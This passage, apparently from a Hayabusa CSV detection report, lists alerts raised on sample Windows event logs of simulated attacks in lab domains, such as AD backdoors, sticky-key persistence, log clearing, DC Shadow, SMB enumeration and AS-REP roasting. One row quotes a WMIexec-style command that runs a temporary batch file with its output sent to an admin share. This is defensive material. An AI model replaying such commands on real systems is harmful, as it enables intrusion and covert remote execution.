+09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this 
computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,Sticky Key Like Backdoor 
Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx +2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process 
execution.evtx +2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47450 : LogonID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34544 : LogonID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 45246 : LogonID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: 
null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP 
Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : 
File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,informational,Network 
Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: null : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 
10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog : Share Name: \\*\dhcp_logs$ : Share Path: \??\C:\DHCP_LOGS : File: DhcpSrvLog-Wed.log : IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54633 : LogonID: 
0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::ffff:192.168.1.2 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob : Workstation: : IP Address: 192.168.1.2 : Port: 54635 : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice : Service: krbtgt : IP Address: ::ffff:192.168.1.2 : Status: 0x0 : PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:56:26.980 
+09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Bob : LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54374 : LogonID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: 192.168.1.100 : Port: 54375 : LogonID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : Port: 54376 : LogonID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL : Service: DC-SERVER-1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx +2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$ : Workstation: : IP Address: fe80::e50e:b89e:4718:3aa : 
